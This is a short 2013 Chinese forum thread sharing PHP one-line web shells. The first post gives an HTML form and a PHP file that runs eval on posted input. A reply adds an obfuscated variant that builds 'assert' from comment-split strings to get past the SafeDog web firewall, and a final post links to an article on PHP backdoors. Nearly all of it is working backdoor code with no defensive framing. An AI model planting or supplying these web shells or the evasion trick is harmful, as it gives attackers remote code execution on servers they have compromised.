ddxiami

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 2088|回复: 2

[调试] php一句话木马

[复制链接]
发表于 2013-9-6 14:49:23 | 显示全部楼层 |阅读模式
页面:index.html
<html>  
<body>  
<form action="a.php" method="post">  
<input type="text" name="c" value="phpinfo();">  
<input type="submit" value="submit">  
</form>  
</body>  
</html>  



页面:a.php
<?php @eval($_POST['c']);?>  
回复

使用道具 举报

 楼主| 发表于 2013-9-6 16:24:40 | 显示全部楼层
变异一句话过安全狗
http://www.crazyage.org/

<?php
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>
回复 支持 反对

使用道具 举报

 楼主| 发表于 2013-9-6 16:30:47 | 显示全部楼层
http://www.freebuf.com/articles/web/9396.html

那些强悍的PHP一句话后门
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|手机版|Archiver|技术文档库 ( 闽ICP备15017263号-2 )|网站地图

GMT+8, 2025-5-19 01:25 , Processed in 0.035424 second(s), 17 queries .

Powered by Discuz! X3.4

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表